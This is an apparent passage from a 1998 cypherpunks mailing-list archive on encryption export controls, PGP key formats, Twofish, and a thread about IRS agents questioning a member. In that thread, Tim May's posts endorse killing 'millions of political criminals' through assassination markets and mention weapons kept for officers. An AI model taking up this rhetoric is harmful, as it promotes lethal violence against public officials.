Yes, and it needs to be priced accordingly. Although corporations do
tend to spend nicely at times.

The key, as with any business, identify your customers and make a
product for them. Not easy, I admit.

> This is not the case with guns, where more resources almost linearly
> buy more power.
>
Gun talk is amusing. I agree that what is going on with gun law is
disturbing but as far as disagreement with the Reptilians is concerned
power is political. As soon as it becomes violent you've lost. Except in
the event of a full-blown revolution. Then we all lose.

> On the wild side, suppose that all crypto restrictions are terminated.
> Some would say that now "they" can break all available stuff. In any
> case the value of crypto products in the eyes of buyers would fall. If
> it is legal it is no good. Most of the research would lose the best
> people. 
> 
Don't you think that this sort of a poker bluff would be a little too
much even for the boldest thinkers in gov't? The stuff they fear most
would be commoditized and I think, in spite of your point, far more of
it would exist than does now. Marketeers would reduce it to bullet items
on packages but many engineers would deliver reasonable products within
the cost constraints.

> Cypherpunks would cease to exist.
> 
Is that why CP exist? Because cryptography has some legal gray areas? I
don't think so.

Enough

This is a painfully slow conversation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Fri, 4 Dec 1998 01:13:05 +0800
To: cypherpunks@toad.com
Subject: Re: Welcome to ChemWeb.com
In-Reply-To: <199812031440.GAA07048@toad.com>
Message-ID: <199812031541.KAA021.77@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <199812031440.GAA07048@toad.com>, on 12/03/98 
   at 06:40 AM, info@chemweb.com said:

>Dear Dr cypherpunks cypherpunks

>Congratulations.

>Your registration has been successful and you are now a
>member of ChemWeb.com, the World-Wide Club for the Chemical
>Community.

This should be fun! <EG>

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Thu, 3 Dec 1998 20:37:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Fwd: FC: Gun groups take aim at new FBI database
Message-ID: <3.0.3.32.19981203110125.0072b774@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain




>From frissell@panix.com:

Some of the following statements do not (in my recollection) apply to those
in California... 
>
>The following statements are true:
>
>It is legal to own a car without a driver's license or vehicle registration.

In CA only "junk" cars can be unregistered. An unregistered car on private
property can be cited under a long list of circumstances. 

>
>It is legal to drive an unregistered car without a driver's license (in
>some circumstances).

It is never "legal" to drive an unregistered vehicle (or even tow it
without a trailer) on CA roads. The judge may let you off if you have "a
real good reason". But the cops can and in most cases will cite you!

>
>No permission is required to purchase a car and felons, the mentally ill,
>children, aliens and those guilty of misdemeanor domestic violence offenses
>can buy cars and most of the above can drive cars on public streets and
roads.

I do believe that there are some legal restrictions for children purchasing
cars...

>
>You are not required to report the purchase of a car to anyone.  

Since every car in CA MUST be registered, every change of ownership must be
reported. If you do not you are subject to a fine. They give you ten days
to report the transfer of ownership.

>
>It is legal to drive a car on public streets and roads in the US with a
>license from any jurisdiction on earth.

Only for a limited period of time in CA...

>
>It is legal to drive a car on public streets and roads in the US that is
>registered in other states or nations.

Not if the owner is a resident of CA, and again only for a limited period
of time.

>
>It is legal to drive a car on public streets and roads in the US that is
>owned by and registered to any person or legal entity.
>
>Legal entities can own and register cars and permit anyone they like to
>drive them.
>

But they assume all the liability and even possible criminal consequences
for letting unlicensed persons drive the car.

>Note that if we regulated guns like driving, the above would mean that you
>could buy and use a gun on your own property without licensing,
>registration or reporting.

NOT in CA...

>
>DCF
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Thu, 3 Dec 1998 12:45:58 +0800
To: coderpunks@toad.com
Subject: MERRY CHRISTMAS! guys!
Message-ID: <Pine.GSO.3.96.981203122241.8357D-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



sorry if you're angry with this

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"If a student is particular about his studies, especially while he is too
young to know which are useful and which are not, we shall say he is no
lover of learning or of wisdom; just as, if he were dainty about his food,
we should say he was not hungry or fond of eating, but had a poor 
appetite. " ---- PLATO

By the way, it's Bernie not Bernardo.
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xena - Warrior Princess <xena@best.com>
Date: Fri, 4 Dec 1998 05:15:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812032032.MAA10218@shell16.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



U.S. claims success in curbing encryption trade

WASHINGTON (Reuters) - Clinton administration officials
Thursday said they had persuaded other leading countries to
impose strict new export controls on computer
data-scrambling products under the guise of arms control.

At a meeting Thursday in Vienna, the 33 nations that have
signed the Wassenaar Arrangement limiting arms exports --
including Japan, Germany and Britain -- agreed to impose
controls on the most powerful data-scrambling technologies,
including for the first time mass-market software, U.S.
special envoy for cryptography David Aaron told Reuters.

The United States, which restricts exports of a wide range of
data-scrambling products and software -- also known as
encryption -- has long sought without success to persuade
other countries to impose similar restrictions.

``We think this is very important in terms of bringing a level
playing field for our exporters,'' Aaron said.

Leading U.S. high-technology companies, including Microsoft
Corp. and Intel Corp., have complained that the lack of
restrictions in other countries hampered their ability to
compete abroad. The industry has sought to have U.S.
restrictions relaxed or repealed, but has not asked for tighter
controls in other countries.

Privacy advocates have also staunchly opposed U.S. export
controls on encryption, arguing that data-scrambling
technologies provided a crucial means of protecting privacy in
the digital age.

``It's ironic, but the U.S. government is leading the charge
internationally to restrict personal privacy and individual
liberty around the world,'' said Alan Davidson, staff counsel at
the Center for Democracy and Technology, a Washington-based
advocacy group.

Special envoy Aaron said the Wassenaar countries agreed to
continue export controls on powerful encryption products in
general but decided to end an exemption for widely available
software containing such capabilities.

``They plugged a loophole,'' Aaron said.

The new policy also reduced reporting and paperwork
requirements and specifically excluded from export controls
products that used encryption to protect intellectual property
-- such as movies or recordings sent over the Internet -- from
illegal copying, Aaron said.

Encryption uses mathematical formulas to scramble
information and render it unreadable without a password or
software ``key.'' One important measure of the strength of the
encryption is the length of the software key, measured in bits,
the ones and zeros that make up the smallest unit of computer
data.

With the increasing speed and falling prices of computers,
data encrypted with a key 40 bits long that was considered
highly secure several years ago can now be cracked in a few
hours. Cutting-edge electronic commerce and communications
programs typically use 128-bit or longer keys.

Under Thursday's agreement, Wassenaar countries would
restrict exports of general encryption products using more
than 56-bit keys and mass-market products with keys more
than 64 bits long, Aaron said.

Each country must now draft its own rules to implement the
agreement.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 20:01:18 +0800
To: <cypherpunks@cyberpass.net>
Subject: blanc's MIB
Message-ID: <199812031135.MAA20864@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 11:54 PM 12/1/98 -0800, Blanc wrote:
>I received my visit from the friendly IRS guys tonight, asking about CJ/Toto.

How did you authenticate them, or why was it unnecessary?


>Kind of amusingly, one of them asked if CJ had ever asked me to join the
Circle
>of Eunuchs!  heh.  

Should have said, "I 'know nothing' about such things"



 One of the investigators
>expressed a great interest in the cpunk dicussions and concepts;  I described
>something of what the list is about and the flow of subscribers through
it, and
>referred him to the archives, saying '94-'95 were some good years.  I'm sure
>given a little time and several dinners we could convert him to the Dark
Side.

Or he could have gotten more intelligence from you.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 3 Dec 1998 21:10:50 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: open-pgp / s/mime interoperability
In-Reply-To: <91222019014234@cs26.cs.auckland.ac.nz>
Message-ID: <199812031239.MAA01783@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Peter Gutmann writes:
> >open-pgp public keys aren't based on X.509 keys, so I would've thought
> >s/mime implementation would barf on them.  
> 
> Actually S/MIME *could* support the use of PGP keys, but there's a field
> (the SubjectKeyIdentifier) missing from the CMS SignerInfo which prevents
> this.  

Surely this in itself should be a compelling argument for inclusion of
the SubjectKeyIdentifier?  If it allows conversion of PGP keys into
S/MIME X.509 keys.

On the subject of whether one could get a PGP key to convert into an
X.509 key such that it would function in the X.509 / S/MIME world, I'm
not sure that much can be transferred into the S/MIME world.

I think the public key parameters (actual bigints will transfer.  I am
less confident about certification transferring (third party
signatures and self signatures on public keys).  The reason I am
unsure about this is that what is signed is not codified in ASN.1 in
such a way that it would be ignored as an extension, but still hashed
by an S/MIME implementation to obtain the same hash.  Or perhaps more
that it would cause an S/MIME implementation to complain of a
corrupted certificate, even though the contents could theoretically be
hashed to get the same hash for signature verification.

Or, more specifically, how could a PGP certificate (self signed, or
signed by someone in your web of trust) be transferred into X.509 such
that the message digest of the signed information would be the same.

Where a PGP certificate includes

0       1       CTB for secret-key-encrypted (signed) packet
1       2       16-bit (or maybe 8-bit) length of packet
3       1       Version byte, may affect rest of fields that follow.
                (=2) for PGP versions <= 2.5
                (=3) for PGP versions >= 2.6
4       1       Length of following material that is implicitly included 
                in MD calculation (=5).
5       1       Signature classification field (see below). 
                Implicitly append this to message for MD calculation.
6       4       32-bit timestamp of when signature was made.  
                Implicitly append this to message for MD calculation.
10      8       64-bit Key ID
18      1       Algorithm byte for public key scheme (RSA=0x01).  
                --Algorithm byte affects field definitions that follow.
19      1       Algorithm byte for message digest (MD5=0x01).
20      2       First 2 bytes of the Message Digest inside the 
                RSA-encrypted integer, to help us figure out if we 
                used the right RSA key to check the signature.

All of these fields are non meaningful for an ASN.1 parser.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Thu, 3 Dec 1998 22:22:16 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: FC: Emergency Powers and National Emergencies
Message-ID: <3.0.3.32.19981203133147.0078ee7c@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



Declan points out some scary stuff here but no president (even Clinton)
would be stupid enough to do something so outrageous. They would have to
know that it would spark a long running a especially bloody revolution. 

Why risk it when they can just keep approaching totalitarianism
incrementally with such activities as the FuckingDICks "Know Your Customer"
activities. It's much quieter and infinitely less likely to result in a
revolution.

APF

>>
>>"The President has the power to seize property, organize and control the
>>means of production, seize commodities, assign military forces abroad, call
>>reserve forces amounting to 2 1/2 million men to duty, institute martial
>>law, seize and control all menas of transportation, regulate all private
>>enterprise, restrict travel, and in a plethora of particular ways, control
>>the lives of all Americans...
>>
>>"Most [of these laws] remain a a potential source of virtually unlimited
>>power for a President should he choose to activate them. It is possible
>>that some future President could exercise this vast authority in an attempt
>>to place the United States under authoritarian rule.
>>
>>"While the danger of a dictatorship arising through legal means may seem
>>remote to us today, recent history records Hitler seizing control through
>>the use of the emergency powers provisions contained in the laws of the
>>Weimar Republic."
>>
>>   --Joint Statement, Sens. Frank Church (D-ID) and Charles McMathias (R-MD)
>>     September 30, 1973
>>
>>
>>I came across this and the Senate special committee's 1973 report on
>>Emergency Powers Statutes in Time Magazine's library. Powerful stuff.
>>
>>-Declan
>>
>>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 4 Dec 1998 04:11:08 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Suggested Reading
Message-ID: <199812031951.NAA21273@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Declarations of Independance: Cross-examining American ideology
Howard Zinn
ISBN 0-06-092108-0
$14.00 US


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Thu, 3 Dec 1998 22:26:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I Got Mine
Message-ID: <3.0.3.32.19981203140629.0078b9c0@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



Now there's a really intelligent response to the MIB! I think Blanc would
have done a better self-service to have responded that way.

MAKE THEM GET A WARRANT! It's your ONLY legal defense against a fishing
expedition! It's our CONSTITUTIONAL RIGHT to require a warrant before
letting them in! We are NOT criminals just because we do not allow the MIBs
to make ILLEGAL and UNCONSTITUTIONAL searches of our properties!

If they can't convince a judge AND obtain a specifically worded search
warrant then they are obviously fishing! Tell to go find a real deep lake...

I also give the writer an A+ for the Clintonian and Reagonesque touches!

APF 

>
>Hello, I'm Special Agent Murfrock of the IRS and this is Special 
>Agent Prenfrew. We'd like to speak with you about C. J. Parker, 
>maybe known to you as "Toto" or "TruthMonger..."
>
>Sorry, I don't recognize any of those. Isn't Toto the dog?
>
>The dog?
>
>Yes, Dorothy's dog in... (stops when he notices that the agents are
>scribbling furiously in their notebooks)
>
>May we come in?
>
>No, I was just about to go to sleep. I'm not well.
>
>Sorry to hear that. We have an e-mail here that you sent to Toto, 
>and another he sent back to you...
>
>May I see those? (takes the printouts)
>
>Sorry, doesn't ring a bell.
>
>Well, if you look at those headers, the ones circled in red, you
>will see that...
>
>You must be kidding! There are more people forging e-mail headers
>than live in St. Louis! Everybody knows that.
>
>Would you mind if we just come in for a moment?
>
>Yes, I would. I told you, I am going to sleep.
>
>Would you mind if we look at your computer?
>
>Why would you want to do that?
>
>Well if you didn't send or receive these messages, you have 
>nothing to worry about.
>
>I don't see any reason to do that.
>
>We can get a warrant, very quickly, as a matter of fact. If you
>cooperate, things will go better for you.
>
>I love to cooperate. I want to cooperate. I am cooperating to the
>fullest extent I believe is required of me. Ask me something that
>makes sense and I'll answer it.

We have learned sooo much from our wonderful President Clinton, haven't we?!

>
>Have you ever heard of a group called the Cypherpunks?
>
>It rings a bell.
>
>Are you a member?
>
>No.
>
>How do you explain the fact that we found your e-mail address on
>a Cypherpunks membership list in a computer we seized?
>
>I have no idea. I don't join organizations.
>
>Are you a member of the Majordomo organization?
>
>No. The only majordomo I've ever heard of is a mail list manager.
>
>Where have you seen this Majordomo?
>
>Oh, everywhere. I think it's worldwide in scope.
>
>(scribble scribble)
>
>It's some kind of utility program. Everybody uses it.
>
>(scribbling stops)
>What can you tell us about it?
>
>Nothing, really. If you want to get on a mail list you send a
>"subscribe" message to a majordomo. If you want to get off, I
>think you send an "unscrive" message.
>
>Have you ever done that?
>
>Maybe. I don't recall. Anyone can submit your e-mail address 
>to lists, so you don't even have to subscribe to be on an 
>e-mail list. And there's so much spam these days that I don't 
>recognize half the stuff I get. 
>
>Spam? (the agents look at each other)
>
>Junk e-mail. I delete most of my e-mail without even reading it.
>Sometimes my email program crashes and it all gets deleted before
>I can look at it.
>
>(scribble scribble)
>How many lists have you joined?
>
>I don't remember. I never paid any attention to those things,
>and since I banged my head three months ago, I haven't been
>remembering a lot of things.
>
>(scribble scribble)
>So, are you denying being a member of the Cypherpunks?
>
>I don't know what that means.
>
>Have you ever subscribed to the Cypherpunks e-mail list?
>
>I have no idea.
>
>You have no idea? You don't remember?
>
>I don't know what I've subscribed to, unsubscribed from,
>what I get, don't get. E-mail is a complete mess and I
>ignore most of it. I'm really not very good at those
>things.
>
>May we look?
>
>No.
>
>Are you going to make us get a warrant?
>
>Get what you like. My disk crashed last week and I threw it away.
>Lost everything. In fact I just formatted my new disk and the 
>only data on it is manuscripts for the columns I write.
>
>Columns?
>
>I write for a magazine and a couple of newspapers.
>
>(oh shit)
>(scribble scribble)
>Oh yeah? Which ones?
>
>I don't think that's appropriate.
>
>Well, we'll be back. Here's my card in case you think of anything
>you'd like to tell us.
>
>Sure.
>
>One more thing. Have you ever been invited to join something
>called The Circle of Eunuchs, e-u-n-u-c-h-s?
>
>I don't recall ever hearing of anything like that.
>
>Do you know who Tim May is?
>
>Nope. Sounds like a real common name, though.
>
>How about Blanc?
>
>Is that French?
>
>Never mind. Thanks. We'll be seeing you.
>
>(I don't _think_ so)
>
>-----
>
>AmnesiaMonger
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Thu, 3 Dec 1998 22:46:35 +0800
To: cypherpunks@cyberpass.net
Subject: RE: I Got Mine
In-Reply-To: <Pine.BSF.4.02.9812021205100.3865-100000@ideath.parrhesia.com>
Message-ID: <3.0.3.32.19981203141821.00721d7c@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



At 09:22 PM 12/2/98 -0800, you wrote:
> From Greg Broiles:
>
>: Just as a reasonable person will likely listen cautiously to an accused
>: person proclaiming their innocence, a reasonable person should also listen
>: cautiously when the prosecution proclaims someone's guilt.
>..........................................
>
>
>Thanks for the advice, it hadn't occurred to me they might be spoofing. <g>
>
>(On a piece of paper they asked me to write down some of the statements I
made
>regarding my limited association with Toto (for the record, in lieu of a
court
>appearance), and asked that I also explain what I mean by "spoofing", as I
had
>thus described what Toto might have been up to with those incendiary
messages.)
>
>To their credit, I will say that they only told me more about Toto's
activities
>during the course of our discussions regarding the point in time when
someone is
>likely to be arrested based on their public expressions.   They related that
>Toto had sent numerous threatening messages to the Mounties, and that
although
>he had alarming info out on his website that was not a problem; that they
took
>action only after he actually planted a bomb in one of their buildings.  Then
>when I asked them as to why he was being tried in this area, rather than
Canada
>or Texas or Arizona, they brought up that Toto had threatened the judge
trying
>Jim's case (and also his other email regarding Billg).
>

You speak as if these are facts. When was the trial? When was it proven
that CJ=Toto (or at least a significant portion of Toto)? When was it
proven that CJ or Toto planted a bomb or threatened a judge? When is
something true just because some MIB says so?!?!?

You have jumped to so many conclusions that I'm astonished that you didn't
just jump in and offer to help string him up yourself! Maybe you did,
deliberately or unintentionally.

COPS LIE!!! FBI agents LIE!!! IRS agents LIE!!! That's why we have a
justice system that was intended to make them PROVE what they say. 

>At least they were not offensive, but polite and pleasant, but it's true one
>should keep one's mind on the facts - the pertinent facts, the pertinence
*of*
>the facts, and no other facts.   I myself, of course, would never lie.
Unless I
>had to. : )
>

"Here little girl, I have some candy for you..." But he was so NICE...

>"Well, it depends on what your definition of  'is'  is . . . "  What a great
>Leader, and a Lawyer, showing us how to deal with the Law.
>

Your BEST defense against them is always to make them demonstrate what they
believe to be true. DON'T tell them anything. If what they say was really
true (now this is important...) AND YOU are not a suspect then they don't
need to talk to you, they already have proof. I'll put that another way...
They talked to you because 1) they still don't have a case, and/or 2) YOU
are a suspect!

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 4 Dec 1998 07:15:31 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <Pine.BSF.4.02.9812021205100.3865-100000@ideath.parrhesia.com>
Message-ID: <v03130326b28cc1ba69cb@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:22 PM -0800 12/2/98, Blanc wrote:

>(On a piece of paper they asked me to write down some of the statements I made
>regarding my limited association with Toto (for the record, in lieu of a court
>appearance), and asked that I also explain what I mean by "spoofing", as I had
>thus described what Toto might have been up to with those incendiary
>messages.)
....
>At least they were not offensive, but polite and pleasant, but it's true one

Think "Good cop, bad cop."

It seems to me that when you invite them in for cookies and tea and have a
"pleasant" conversation with them, you are only helping to put away Toto.
Whatever you tell them, they will almost certainly only use the negative
things you tell them. Or the general knowledge you give them, or contact
lists, etc.

I have not been contacted by either American or Canadian cops with regard
to either Jim Bell or Toto. I _hope_ I will have the presence of mind to
tell them to leave.

I certainly cannot foresee letting them inside my home, if only because I
expect they would get nervous about the Winchester Defender 12-gauge
sometimes left leaning against a wall, and the various assault rifles left
at the read in case a narc needs to be dispatched.

Also, my time is not free. If they want my expertise on some matter, let
them pay my consulting rate. As this is unlikely to happen, I would simply
(I hope) tell them to leave my property immediately.

(My planned answer, rehearsed in my mind over the several "scares" seen in
recent years, is to say something along the lines of: "Am I under arrest?
If so, I wish to speak to a lawyer. If not, please leave.")

If they want me to speak about assassination markets, the need for killing
millions of political criminals, and the use of anonymous systems for
smashing the state, why would I ever agree to speak with cops?

Blanc, I'm afraid that in your desire to be "helpful," you have only
worsened the situation for Toto. Believe me, they are not interested in
exculpatory evidence...whatever that might be in this context. They are
more likely interested in contact lists, in educating themselves to make
themselves more convincing witnesses, etc. Expect to see any knowledge you
conveighed to them coming back in Toto's trial from the mouths of
prosecution witnesses.

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Thu, 3 Dec 1998 23:57:44 +0800
To: cypherpunks <cypherpunks@cyberpass.net>
Subject: Re: your mail
In-Reply-To: <199812031421.PAA00408@replay.com>
Message-ID: <19981203152033.A4180@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Dec 03, 1998 at 03:21:32PM +0100, Anonymous wrote:
> Is anyone aware of any critical evaluations 
> performed on the security of the Network Associates 
> (a.k.a. McAfee) PGP for Personal Privacy?  Traditionally, 
> PGP source code has always been available for 
> evaluation by the Net community, but this isn't the 
> case with the newer commercial versions.

are you sure?

according to

http://www.pgpi.com/ 

PGP 6.0.2i available soon

The PGP 6.0.2 source code books have arrived in Europe, and work is
going on to scan them in and create an international version: 6.0.2i.
However, there are 25 volumes and over 12,000 pages, so it will
probably take a while to finish.

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

in the top 40, half the songs are secret messages to the teen world to
drop out, turn on, and groove with the chemicals and light shows at
discotheques. -- art linkletter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 22:54:54 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812031421.PAA00408@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Is anyone aware of any critical evaluations 
performed on the security of the Network Associates 
(a.k.a. McAfee) PGP for Personal Privacy?  Traditionally, 
PGP source code has always been available for 
evaluation by the Net community, but this isn't the 
case with the newer commercial versions.

Additionally, and this is a bit paranoid, but PGP in 
the past has come with digitally signed files to 
authenticate the integrity of the files.  Once again, 
commercial versions offer no such guarantee that the 
software hasn't been tampered with between the factory 
and the store shelves.

Comments?
        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Fri, 4 Dec 1998 06:18:41 +0800
To: cypherpunks@toad.com
Subject: Twofish/AES News
Message-ID: <199812032135.PAA14339@baal.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



There are some new papers on the Twofish webpage.

We have improved our performance numbers.  On Pentium-class machines, key
setup is faster.  We also have large-RAM implementations, that speed key
setup at the expense of 256K of RAM.  We aso have a variety of performance
options on smart cards, trading RAM off for speed.  And finally, we have a
new hardware implementation that reduces the total gate count.  Details are
in Twofish Technical Report #3:

	http://www.counterpane.com/twofish-speed.html

Dave Barton has implemented Twofish in Delphi:

	http://www.hertreg.ac.uk/ss/d_crypto.html

And finally, we have compared the performance of all AES submissions on
32-bit processors, smart cards, and hardware.  Our results are in.

	http://www.counterpane.com/AES-performance.html

As always, thanks for your support.

Bruce 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@chemweb.com
Date: Fri, 4 Dec 1998 10:10:23 +0800
To: cypherpunks@toad.com
Subject: ChemWeb password
Message-ID: <199812040123.RAA12872@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Your request for a ChemWeb password has been received.
We will try to help you out as soon as possible.

For additional help with technical problems, please see our online 
help guide at

http://chemweb.com/help/html/index.html

Thank you

ChemWeb administration




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 4 Dec 1998 08:47:56 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <000201be1e81$1d19d800$7d8195cf@blanc>
Message-ID: <v04011721b28ccb62ad25@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:42 PM -0500 12/3/98, Tim May wrote:
>
>If they want me to speak about assassination markets, the need for killing
>millions of political criminals, and the use of anonymous systems for
>smashing the state, why would I ever agree to speak with cops?

	I think millions is overstating things just a little bit, unless
you mean world wide.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 4 Dec 1998 11:18:32 +0800
To: cypherpunks@cyberpass.net
Subject: RE: I Got Mine
In-Reply-To: <v03130326b28cc1ba69cb@[209.66.100.75]>
Message-ID: <v03130327b28cfbd19803@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:13 PM -0800 12/3/98, Petro wrote:
>At 5:42 PM -0500 12/3/98, Tim May wrote:
>>
>>If they want me to speak about assassination markets, the need for killing
>>millions of political criminals, and the use of anonymous systems for
>>smashing the state, why would I ever agree to speak with cops?
>
>	I think millions is overstating things just a little bit, unless
>you mean world wide.

Those of who have voted to take away guns, those who have actually done the
taking away, those who have sent in JBTs to break into homes, those who
have ....

It adds up fast. Whatever the precise total is, removing them is what
crypto anarchy and untraceable transactions make possible. Read about this
is my Cyphernomicon, released long before Jim Bell had his "wonderful idea."

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Fri, 4 Dec 1998 13:07:47 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <v03130326b28cc1ba69cb@[209.66.100.75]>
Message-ID: <000b01be1f40$5606b240$2f8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



Well, I'm glad my post has stirred up everyone into providing examples of proper
cpunk behavior/responses when confronted with a visit from the Friendly
Neighborhood Investigation Corp.   It's great you're sharing your ideas on
recalcitrance and resistance, it's more useful than all the jibberjabber about
how much you hate the govmt.   (Yes, but how do you actually respond to a real
live representative standing at your door (they showed me their Batches), to a
real-live situtation when you are taken to a little room and asked to strip
("asked"?) at the airport?)   Ya'll should have done this earlier, when the news
of Toto first came out.  And think about it now, because if any mail from you
was on his computer, you're likely to be next.

But relax!  -  I said nothing which is not public knowledge, which is not
already evident from the list archives.  As far as I'm concerned, it was true
but essentially useless.   I confirmed things which they already knew or would
already know from the postings to the list -  they mentioned Tim's attitude, for
instance, and Declan's stories on Toto, and the info on John Young's website,
and Toto's website, and asked me if I knew of Adam Back (who?).   Furthermore,
just because I am nice and mannerly doesn't mean I couldn't as well be a
hypocrite.   James Bond is also a complete gentleman.  Depending on the
circumstance.
(Q:  so, are you a hacker?   A:   <g>  no.  I don't know Unix)


Tim said:

: Blanc, I'm afraid that in your desire to be "helpful," you have only
: worsened the situation for Toto. Believe me, they are not interested in
: exculpatory evidence...whatever that might be in this
: context. They are more likely interested in contact lists, in educating
: themselves to make themselves more convincing witnesses, etc. Expect to see
any
: knowledge you conveighed to them coming back in Toto's trial from the mouths
of
: prosecution witnesses.

I was not being "helpful".  I relied to their inquiries; I didn't offer
information.  I made my own inquiries to them, as I already said, about the
dividing line between free speech and when they will go seeking to arrest a
person.

In terms of educating them, I don't have any objections to probing their mind to
see what/how they think about things which we have discussed at length on the
list.   I also don't have any objections in referring them to read further:   I
told them that the cpunks often have deep discussions on this and other such
subjects, where we  pursue an understanding of controversial issues like free
speech and privacy.   I told them that there were many very smart people on the
list, especially back in the earlier years, although some of these had left to
pursue their other interests.  I told them it is an open forum where people come
and go - they stay awhile, sign off, return, there are kooks who show up and get
people riled up, there are those who bring up contradictions and get jumped on
for their philosophical errors.  I said that the spectrum of philosophies
regarding governments go from the extreme anarchists who want to be completely
self-governing, to those on the opposite end who would like to have a camera in
every room of their house watching them in case anything went wrong.  I said
that most people are in the middle, not wanting too much governance but not
totally against it.  I said that when the opposite groups clash, there is a lot
of heat and sometimes light.  (they didn't ask, and I didn't tell them, which
side of the spectrum I'm on)

If one of the investigators says he is interested in the concepts of which we
discuss, I am glad to bring up any points I can make for the side of
